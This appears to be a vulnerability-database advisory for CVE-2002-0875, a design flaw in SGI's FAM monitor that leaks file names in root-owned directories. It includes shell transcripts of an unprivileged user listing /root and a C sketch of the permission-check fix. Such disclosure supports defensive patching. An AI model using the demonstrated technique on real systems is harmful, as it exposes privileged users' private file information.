SGI FAM Vulnerability Allowing File Listings of Arbitrary root-Owned Directories to Be Obtained

Vulnerability ID: 1106923
Vulnerability type: Design error
Published: 2002-08-16
Updated: 2005-05-02
CVE ID: CVE-2002-0875
CNNVD-ID: CNNVD-200209-018
Affected platform: IRIX
CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/21720
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200209-018
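|Vulnerability details
fam is an open source file alteration monitor developed and maintained by SGI; it can also be used on other Linux and Unix operating systems. fam contains a design error that a local attacker can exploit to obtain sensitive file names under directories owned by a highly privileged user. When FAM is used to monitor a directory, a user who is only a group member should receive only the Exists and EndExist events, for example:

# ls -ld /root
drwxr-x--- ... root root ... /root
# fam
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: /root EndExist

However, because of the design error, running FAM returns the following instead:

% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: .gnome Exists
DIR /root: Desktop Exists
...

This discloses sensitive file names in the high-privilege directory.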
|Exploit
source: http://www.securityfocus.com/bid/5487/info

fam is a freely available, open source file alteration monitor. It is maintained and distributed by SGI, and will work on the Linux and Unix operating systems.

It is possible for a user to execute fam to discover a list of monitored files. This list, while it may have been created by a user of elevated privileges, could leak information to an attacker that may be sensitive. This vulnerability requires only that the directory being 'fammed' already have had the program executed against it by a privileged user.

# ls -ld /root
drwxr-x--- ... root root ... /root
# fam

% groups | grep root

ERRONEOUS BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: .gnome Exists
DIR /root: Desktop Exists
...

CORRECT BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: /root EndExist
---------------------------------------- 
(% indicates a command run as an unprivileged user)
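
The difference between the two transcripts above comes down to whether entry names are filtered by the requesting client's right to list the directory. The following is an added example, not fam's code or the vendor's patch: it sketches that check using classic Unix mode bits only (no ACLs), and the struct and function names are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Hypothetical: identity of the client that requested the monitor. */
struct client_cred { uid_t uid; const gid_t *groups; size_t ngroups; };

/* Unix class selection: exactly one of owner/group/other applies, so a
 * group member denied by the group bits does not fall through to "other". */
static bool may_read_dir(mode_t mode, uid_t owner, gid_t group,
                         const struct client_cred *c)
{
    if (c->uid == 0) return true;                 /* superuser */
    if (c->uid == owner) return (mode & S_IRUSR) != 0;
    for (size_t i = 0; i < c->ngroups; i++)
        if (c->groups[i] == group) return (mode & S_IRGRP) != 0;
    return (mode & S_IROTH) != 0;
}

/* Fill out[] with the names reported as "Exists" before "EndExist".
 * The directory itself is always reported; entry names only when the
 * requesting client could have listed the directory. Returns the count. */
static size_t exists_events(const char *dir, mode_t mode, uid_t owner, gid_t group,
                            const char *const *entries, size_t n,
                            const struct client_cred *c,
                            const char **out, size_t cap)
{
    size_t k = 0;
    if (k < cap) out[k++] = dir;
    if (!may_read_dir(mode, owner, group, c)) return k;
    for (size_t i = 0; i < n && k < cap; i++) out[k++] = entries[i];
    return k;
}

int main(void)
{
    /* Constructed sample: /root is drwxr-x--- root:root, as in the transcript. */
    const char *const entries[] = { ".gnome", "Desktop" };
    const gid_t g[] = { 1000 };
    const struct client_cred user = { 1000, g, 1 };
    const char *out[8];
    size_t k = exists_events("/root", 0750, 0, 0, entries, 2, &user, out, 8);
    for (size_t i = 0; i < k; i++) printf("DIR /root: %s Exists\n", out[i]);
    printf("DIR /root: /root EndExist\n");
    return 0;
}
```
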
|References
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SN-02:05.asc
ftp://patches.sgi.com/support/free/security/advisories/20000301-03-I
Patch: http://www.debian.org/security/2002/dsa-154
http://www.iss.net/security_center/static/9880.php
http://www.redhat.com/support/errata/RHSA-2005-005.html
http://www.securityfocus.com/bid/5487